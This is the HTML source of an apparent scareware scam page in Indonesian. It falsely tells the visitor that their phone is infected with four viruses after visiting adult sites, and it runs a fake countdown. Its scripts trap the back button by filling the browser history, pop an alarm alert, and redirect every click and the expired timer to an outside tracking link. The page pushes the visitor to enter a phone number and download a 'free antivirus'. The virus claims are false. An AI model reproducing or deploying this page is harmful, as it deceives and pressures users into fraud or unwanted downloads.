


<!DOCTYPE html>

<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="icon" href="data:,">
<meta name="robots" content="noindex, nofollow">
<meta name="googlebot" content="noindex">
<meta name="viewport" content="user-scalable=no, initial-scale=1.0, maximum-scale=1.0, width=device-width">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black">
<meta http-equiv="refresh" content="34; url= http://jump.zmobistein.com/?jp=5d83a318bd39d&id=608_id_1_xxxx_4078_2_1t&nxl=5d4415e34e185_461208_5333&mjump=13x4078x5d8f1d748fc07&subid=6741639521202340036&p=247">

<title>Perhatian! Virus terdeteksi</title>
<script>var seconds=35; var hundreds=0; function secondPassed(){var minutes=Math.round((seconds - 30) / 60); var remainingSeconds=seconds % 60; if (remainingSeconds < 10){remainingSeconds="0" + remainingSeconds;}document.getElementById('countdown').innerHTML=minutes + ":" + remainingSeconds + ":" + hundreds; if (hundreds===0){if (seconds===0){clearInterval(countdownTimer); window.location="http://jump.zmobistein.com/?jp=5d83a318bd39d&id=608_id_1_xxxx_4078_2_1t&nxl=5d4415e34e185_461208_5333&mjump=13x4078x5d8f1d748fc07&subid=6741639521202340036&p=247";}else{seconds--; hundreds=100;}}else{hundreds--;}}var countdownTimer=setInterval('secondPassed()', 10);</script>

<style type="text/css">
@media only screen and (min-width: 550px)
{
#wrapper{

max-width:500px !important;
}
#timer p{
font-size:14px !important;
}

}
h1 {font-size: 22px;text-transform: uppercase;}
#timer p,p{color:#555}
#today {
    float: right;
   font-weight: 600;
    padding-top: 15px;
    display: none;
}
.img1 {width: 100%;max-width:400px;}
#error,#timer{display:inline-block;float:left}#timer p,.btn{#font-weight:700}body{font-family:sans-serif}a{text-decoration:none}footer,header,section{clear:both}*{margin:0;padding:0}#wrapper{margin:0px auto;max-width:440px;border:0 solid #303030;border-radius:0}p{font-size:14px;padding:5px 0}#timer{max-width:290px;width:65%}#timer p{font-size:12px}#error{max-width:120px;width:35%}#error img{width:100%}.container{padding-left:8px;padding-right:8px}

#blink{color:#f00000;padding:6px;-webkit-animation:blink 1s infinite;-moz-animation:blink 1s infinite;-ms-animation:blink 1s infinite;-o-animation:blink 1s infinite;animation:blink 1s infinite;}
@-webkit-keyframes blink{0%{opacity:1.0;}
50%{opacity:0.0;}
100%{opacity:1.0;}
}
@-moz-keyframes blink{0%{opacity:1.0;}
50%{opacity:0.0;}
100%{opacity:1.0;}
}
@-ms-keyframes blink{0%{opacity:1.0;}
50%{opacity:0.0;}
100%{opacity:1.0;}
}
}
@-o-keyframes blink{0%{opacity:1.0;}
50%{opacity:0.0;}
100%{opacity:1.0;}
}
@keyframes blink{0%{opacity:1.0;}
50%{opacity:0.0;}
100%{opacity:1.0;}
}

@media only screen and (max-width: 959px) {
}
@media only screen and (min-width: 768px) and (max-width: 959px) {
}
@media only screen and (max-width: 767px) {
}
@media only screen and (min-width: 480px) and (max-width: 767px) {
}
@media only screen and (max-width: 479px) {
}
@media only screen and (max-width: 320px) {
    h1 {font-size: 16px;text-transform: uppercase;}
    p {
    font-size: 14px;
    padding: 1px;
}
}

</style>

</head>
<body onclick="goto()">

<div id="wrapper">

<div class="container">
  <header> <center>
      <img class="img1" src="./imgs/header.jpg" style="width: 200px;" alt="" align="absmiddle">
<div id="today">
            <script type="text/javascript">
                var currentTime = new Date();
                // Array of day names
				var dayNames = new Array("Ahad", "Isnin", "Selasa", "Rabu", "Khamis", "Jumaat", "Sabtu");
				var date = currentTime.getDate();
				var year = currentTime.getFullYear();
				document.write(dayNames[currentTime.getDay()]+" "+date+", "+year);
			</script>Isnin 27, 2018Sabtu 28, 2017

</div>
</center></header>


  <section>
    <h1><img src="./imgs/danger.png" width="20" height="15" alt="">
Perhatian! Ponsel Anda <script>document.write(getURLParameter('brand'))</script>-<script>document.write(getURLParameter('model'))</script> telah terinfeksi oleh <span id="blink" style="font-size: 22px; color: #FF0206;text-transform: uppercase;">(4)</span> virus! </h1>
  </section>
  <section>
    <div id="timer">
                <p><span style="color: rgba(251,5,9,1); font-weight: bold;font-size:14px;">Penting!</span> <span style="color: #FD0206">Kami telah mendeteksi bahwa Anda baru-baru ini mengunjungi situs konten dewasa di mana Anda telah terinfeksi virus ini. Kartu SIM Anda akan diubah serta kontak, foto, data, aplikasi, dan lain-lainnya milik Anda, akan rusak.</span></p>

		  <span style="font-size: 30px; font-weight: bold; color: red; font-family: sans-serif;" id="countdown" class="timer">0:28:92</span>
</div>
      <div id="error"><img src="./imgs/imp.gif" alt=""> </div>
  </section>
    <section>
    <p> <b>Untuk membersihkan ponsel Anda sekarang (ikuti instruksi):  </b>
     <br>
      <br>
      <strong id="blink">Langkah 1: </strong>Klik <strong style="color: rgb(5, 86, 251); font-weight: bold;">"HAPUS VIRUS"</strong>, masukkan nomor telepon Anda dan ikuti instruksi di halaman selanjutnya!<br>
      <br>
      <strong id="blink">Langkah 2:  </strong>Anda harus mengunduh <strong style="color: rgb(5, 86, 251);">Antivirus Gratis</strong>, <strong style="font-weight: bold;">dan menghapus semua virus serta memulihkan ponsel Anda!</strong></p>
    <p></p>
  </section>
  <footer>
    <p align="center"><a class="btn12" style="background-color: #00a5ff; border-radius: 5px; color: rgb(255, 255, 255);  font-size: 16px; font-weight: bold; display: block; line-height: 50px; max-width: 375px; width: 90%;" href ="http://jump.zmobistein.com/?jp=5d83a318bd39d&id=608_id_1_xxxx_4078_2_1t&nxl=5d4415e34e185_461208_5333&mjump=13x4078x5d8f1d748fc07&subid=6741639521202340036&p=247">HAPUS VIRUS</a>  </p>
  </footer>
    <p style="padding: 5px 5px; text-align: center; color: rgb(224, 39, 39); font-size: 12px;">Ini akan memakan waktu 30 Detik dan ponsel Anda akan aman lagi.</p>
</div>
<script>
function getURLParameter(name) {
    return decodeURI(
        (RegExp(name + '=' + '(.+?)(&|$)').exec(location.search)||[,null])[1] || ''
    );
}
</script>


<script type="text/javascript">
! function () {
var t;
try {
for (t = 0; 20 > t; ++t) history.pushState({}, "", "#");
onpopstate = function (t) {
t.state && location.replace("")
}
} catch (o) {}
}();
</script>


<script type="text/javascript">setTimeout(function(){alert("Perhatian! \n\n Ponsel Anda Sudah Terinfeksi oleh virus!   \n\n Segera bersihkan Virus! Klik [OK]. \n\n Klik [OK].")},200);</script>
<script language="JavaScript" type="text/javascript"> function goto(){ location.href ="http://jump.zmobistein.com/?jp=5d83a318bd39d&id=608_id_1_xxxx_4078_2_1t&nxl=5d4415e34e185_461208_5333&mjump=13x4078x5d8f1d748fc07&subid=6741639521202340036&p=247" } </script>
</div>
</body></html>
